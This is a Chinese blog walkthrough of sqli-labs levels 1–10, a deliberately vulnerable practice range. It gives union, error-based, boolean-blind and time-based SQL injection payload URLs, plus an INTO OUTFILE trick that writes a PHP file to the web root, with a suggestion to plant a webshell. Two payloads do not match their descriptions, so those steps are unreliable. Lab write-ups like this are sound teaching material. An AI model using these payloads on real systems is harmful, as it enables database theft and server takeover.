sqli-labs靶场,全通关文字解析

最新推荐文章于 2025-01-02 14:49:38 发布
最新推荐文章于 2025-01-02 14:49:38 发布
阅读量1.2k 收藏 21
点赞数 27
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/canyiguichen/article/details/142375319
版权

爆表名

select group_concat(table_name) from information_schema.tables where table_schema='库名'

爆字段名

select group_concat(column_name) from information_schema.columns where table_name='表名' and table_schema='库民'

爆内容

select group_concat(列1,列2) from 库名.表名

sql靶场下的数据库challenge 中的一个表的值是随机变的,每次都可能不一样

首先是靶场第一关
我使用的是联合查询,优先级是这样的 联合查询>报错注入>布尔盲注>延时注入


第一关

首先判断闭合符号
1'报错了,我们查看报错信息发现闭合符号是'我们接着使用-- -去让这个信息不报错
然后and order by 判断列数,根据我们的报错信息以及我们的列数回显判断我们的注入语句应该放在哪里
然后就找到了注入的地方
在'1'后面联合查询我们要查询的语句
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-1/?id=1111' union select 1,2,group_concat(schema_name) from information_schema.schemata-- -


第二关
输入闭合符号后去掉外层注释符号发现没有闭合符号,那么直接注入sql语句即可
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-2/?id=111%20union%20select%201,2,database()--%20-

第三关
输入闭合符号后发现是('这样闭合的')
我们闭合成功后注入语句即可
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-2/?id=111%20union%20select%201,2,database()--%20-

第四关
输入闭合符,发现还是有这个报错信息的
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-4/?id=111") union select 1,2,database()-- -

第五关
第五关输入id后发现我们的这个页面没有回显具体的数据,那么我们的操作就不能是联合注入了
我们输入闭合符号发现报错信息还存在,就使用报错注入
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='information_schema'),0x7e),1)-- -
如果报错的信息没有完全显示,我们可以使用substr(语句,1,32)来一段一段截取记得语句要加上括号
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='information_schema'),0x7e),1)-- -

第六关
还是报错注入,我们输入这个符号"即可完成闭合
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -

第七关
首先判断闭合符号,得出我们的闭合符号是'))然后根据order by 来判断我们的这个回显列数是3列
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-7/?id=1%27))%20order%20by%203--%20-
然后根据他的提示,我们可以使用outfile去进行注入
我们注入即可
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-7/?id=1%27))%20union select 1,2,'<?php phpinfo();?>' into outfile 'C://hell.php'--+
使用这条语句,虽然会报错,但是实际会写入我们的c盘一些文件
我们可以去前几关使用@@datadir和@@basedir来看数据路径和数据库路径
最后我们找到正确的路径后运行即可,当然,写入一句话木马然后远程连接也行哦
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-7/?id=1%27))%20union select 1,2,'<?php phpinfo();?>' into outfile 'D://phpstudy_pro//WWW//hahahamanman//sqli-labs-master//Less-7//1.php'--+

第八关
输入我们的单引号之后发现没有报错回显,我们拼接一些正确的语句来查看我们是否能使用sql注入中的布尔盲注
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-8/?id=1'-- -
正确回显了,那么这个闭合符就是单引号
substr在联合我们的sql语句即可
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-8/?id=1' and substr((select database()),1,1)="s"-- -

第九关
发现,这里不论输入什么都是回显我们的"You are in....."
猜测使用的是延时注入,我们这样操作来得到我们的闭合符号是单引号
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-9?id=1' and if(1=1,sleep(5),1)-- -
那么我们吧1=1替换为substr切割sql语句即可
http://192.168.244.195/hahahamanman/sqli-labs-master/Less-9?id=1' and if(substr((select database()),1,1)="s",sleep(5),1)-- -

第十关
和第九关的操作是一样的
先得到我们的闭合符号是双引号

最低0.47元/天 解锁文章
canyiguichen
关注
智能电源管理技术--原理简介
撒哈拉的绿洲
02-28 6015
一、专业术语          1. LDO(Low Dropout Regulator)              低压差线性稳压器              优点:稳定性好,负载响应快,输出纹波小               缺点:效率低,输入输出的电压差不能太大          2. DC-DC(Direct Current to Direct Current)
Charger IC原理讲解与个人理解
KEEPergoing的博客
10-16 4372
这是在现在的笔记本中的PD(快充)、DP(显示协议)的方案,只看PD。当插入一个适配器时,通过Type-C的CC1、CC2进行握手,有的PD芯片具有识别控制IO引脚,可以通过这个做逻辑,再让电力通过进入Charger芯片。安森美的PD芯片示意图中展示是电力通过OVP(Over Voltage Protection,过压保护)直接进入到Charger芯片中去。它的主要功能是控制电池的充电过程,以确保安全、有效地为电池充电,同时延长电池的使用寿命。
手机快充芯片及其技术标准和设计原理详解
weixin_43519391的博客
01-12 1万+
手机快充芯片及其技术标准和设计原理详解 智能手机对于宽带无线通信、图像处理等多方面的需求导致实际耗电呈指数增长。未来5G通信带宽将比4G增加10倍,4K/8K等高清视频技术逐渐应用,CPU、GPU等运算电路处理能力不断增强,这一切都将导致智能手机整体能耗需求将成指数增长。 电池容量呈线性缓慢增长,能耗需求缺口逐渐拉大。电池技术迟迟无法突破,成为终端使用的最大瓶颈。电池容量增长缓慢,每年线性提升约15%,而能耗则是呈指数增长,能耗需求与电池性能的差距愈发明显。电池性能曲线将与能耗需求曲线严重脱..
NTC(电池温度检测)
chylovecsd的博客
05-25 8250
https://blog.csdn.net/mcgrady_tracy/article/details/52818100 NTC 那是當作電池的溫度偵測用, 通常 NTC 是要包裝在電池內部。但是有些電池沒有 NTC,所以就需要外掛 NTC 放置於電池附近去偵測電池溫度。 如果直接使用外部電源而且沒有充電功能,基本上 NTC 是可以拿掉。(但是軟件人員要會改 MTK 的程序代碼,否則會開不機或是其他問題出現) 手机里面电池通常有4个引脚,即电池的+、-极,ID引脚、NTC引脚。 ID引脚用来识
MTK手机平台充电原理
热门推荐
汽车以太网和SOA
11-13 1万+
MTK手机平台充电原理
Moody-charger.rar_charger_充电_原理图 产品_电瓶车_量产
07-15
综上所述,"Moody-charger.rar"中的充电器设计不仅涉及到电气工程的基础理论,如电力电子、控制理论,还涉及到实际工程中的诸多考量,如可靠性、安全性、成本优化等。通过深入研究这款产品的原理图,我们可以更深入...
基于C语言核心功能的便携式锂聚合物充电器cheali-charger设计源码
09-29
C语言作为该项目的核心开发语言,以其高效的运行性能和良好的硬件控制能力,为Cheali-Charger提供了坚实的技术基础。C语言在嵌入式系统开发中占据着举足轻重的地位,特别是在需要直接与硬件进行交互的应用中。在...
chongdianqi.rar_charger_充电器_充电程序
09-23
对于开发者来说,这是一份宝贵的资源,可以学习和理解充电器软件设计的细节,也可以作为自定义或改进充电器功能的基础。 总的来说,这个压缩包涉及的知识点涵盖了充电器的硬件控制、保护机制以及人机交互,这些都是...
80-P8536-1-A-QUALCOMM-CHARGER-DETECT-ISSUES-DEBUG
10-09
【80-P8536-1-A-QUALCOMM-CHARGER-DETECT-ISSUES-DEBUG】指南是高通(Qualcomm)公司为解决其电源管理集成电路(PMIC)在充电检测过程中遇到的问题而提供的内部调试文档。该文档详细阐述了如何处理与高通充电器检测...
RTC_2SEC_REBOOT_ENABLE
TopicDev的专栏
10-22 2254
拔掉电池,然后快速插上。 这时候手机会自动开机。 设置 RTC_2SEC_REBOOT_ENABLE 为 0
MTK的充电方案—PMIC充电
u010783226的专栏
02-02 8556
MTK的充电方案—PMIC充电  MTK目前有三套充电方案,主要如下: (1)线性充电——linering charge(PMIC充电)      充9停1,充电电流不能太大,目前最大能做到1.2A; (2)switch charge(charger IC充电)      有单独的充电IC控制,无充9停1,充电电流可以大。 (3)MTK pump exp
mt6737电池状态监测
Android开发
05-30 3553
   这里分析下mt6735平台下的电池驱动,使用的bq24296芯片(开关模式的充电方式)。kernel-3.18/drivers/power/mediatek/battery_common.cstatic int battery_probe(struct platform_device *dev) { struct class_device *class_dev = NULL; int r...
升降压电路Charger&Boost 自己的小解读
Zoie_的博客
06-15 1959
上图为charger内部大致的结构图,Vbus进来,Q1可先认为是二极管,当Q2开启时,可以向后级电感储能;当Q2关断时,Q3、SW、电池形成一个回路(因为同样接地),电感给电池充电。 锂电池标称值为3.7V,满电电压是4.2V,VBUS电压是5V,从VBUS向电池充电相当于降压过程,从电池向VBUS方向则相当于升压过程。 当开关闭合时,A点的电压为0,Vi直接给电感L充电,充电电流路径见下图,开关导通时间dt=占空比开关周期=DT。 当开关断开时,L中存储的能量会通过二极管,给负载放电;同时,Vi也会
手机charger芯片的选型方案及外围电路搭建
qq_43298471的博客
07-31 4944
保护元件的大小和类型需要根据充电器的工作条件和故障模式来选择,一般来说,保护元件越多,安全性越高,但是成本也越高;输出滤波元件的大小和类型需要根据充电器的拓扑结构和参数来选择,一般来说,电感越大,纹波越小,但是效率也越低;输入滤波电容的大小和类型需要根据输入源的特性和充电器的要求来选择,一般来说,电容越大,滤波效果越好,但是成本也越高。开关升压charger芯片是一种特殊的方案,它使用开关管和电感来实现输入电压到电池电压的升压转换,效率较低,但可以支持低输入电压的充电源,例如太阳能板或热电发生器。
全智平台电源管理芯片-AXP813
天高任鸟飞海阔凭鱼跃的专栏
07-06 5681
1、 Overview AXP813是一个高集成的电源管理芯片和音频编解码芯片,大小11mm*11mm。芯片包含了电源管理、音频编解码、兼容USB3.0的flash charger、实时时钟RTC、模数转换ADC以及硬件DSP。 AXP813提供了21路的电源输出以及多通道的12位ADC转换通道用于检测电压、电流和温度等,并集成了OVP、UVP、OTP和OCP等保护电路来确保供电系统的稳定性和...
MTK添加充电(快充)
2201_75918415的博客
08-01 2717
很多时候需要把不用的宏开关给关掉,要不在某些驱动里面会识别运行,可能会让器件运行不起来(我就遇到过一次调试的时候因为添加打印log,打印出来的信息编码对不上,是乱码,造成系统一直开机重启,把log信息去掉就好了)MTK_DUAL_CHARGER_SUPPORT = no //外部充电ic的时候启用比如sd7601,rt9465。1.在添加充电之前,看准原理图弄清楚,你的充电是通过gpio供电,还是走pmic的。MIVR = “設定的允許的充電器最低電壓”VBUS = “测量到充电器的电压”
Android 8.1 默认开机日期
多学一点点
12-05 1532
现在android 8.1的软件 默认开机日期是2010年1月1日,客户说要改成2018年1月1 日,如何修改? 直接上代码 ,亲测有效 路径:alps\\vendor\mediatek\proprietary\bootable\bootloader\preloader\custom\工程名称\inc\cust_rtc.h #ifndef __CUST_RTC_H__ #define __...
mtk上电开机记录
最新发布
qq_49102600的博客
01-02 325
e.vendor/mediatek/proprietary/bootable/bootloader/preloader/platform/mt6765/src/drivers/mt6370.c(有mt6370就需要修改)
10、充电电流的调用流程
weixin_36044869的博客
03-04 3410
从 mtk_cooler_bcct_v1.c文件开始分析,这个里面的东西和温度有关 chrlmt_set_limit_handler 函数 static void chrlmt_set_limit_handler(struct work_struct *work) { if (bat_info_charging_type == 3) { mtk_cooler_bcct_dprintk_al...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值